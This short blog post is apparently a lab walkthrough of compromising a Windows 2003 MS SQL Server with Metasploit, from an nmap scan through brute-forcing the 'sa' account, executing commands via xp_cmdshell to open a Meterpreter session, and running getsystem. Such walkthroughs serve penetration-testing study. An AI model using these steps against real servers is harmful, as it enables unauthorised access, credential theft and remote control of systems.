Aloha,
Lets see how we can use the Metasploit framework to pawn an MS SQL Server
Our Lab:
A MacBook with Vmware Fusion on it
Target: A Vrtual Guest with Windows 2003 Server with the Ip address 172.16.226.131
Attacker: A Virtual Guest with Backtrack 5R1 with the Ip address 172.16.226.128
So Lets go….
Commands:
- nmap -O target
The SQL Database TCP port 1433.
- mssql_ping
Setting the RHOSTS option we can get information about the database including version information, server name etc
- mssql_login
Setting the options RHOSTS, PASS_FILE, VERBOSE we can brute-force attack the target for valid credentials. If the server is misconfigured or the passwords are weak we can find accounts that we can use in the next command. Here I am attacking to the “sa” account. The “sa” account is the DBO (db_owner) for all databases created on the server. The account has administrative privileges on the database.
[+] 172.16.226.131:1433 – MSSQL – successful login ‘sa’ : ‘password’
- mssql_payload
Setting the options RHOSTS,PASSWORD which are set from the previous command we can try to exploit the Server. The exploit uses the “xp_cmdshell” stored procedure to execute commands on the Server.
[*] Meterpreter session 1 opened
- getsystem
I am working on a new post about metepreter so stay tuned….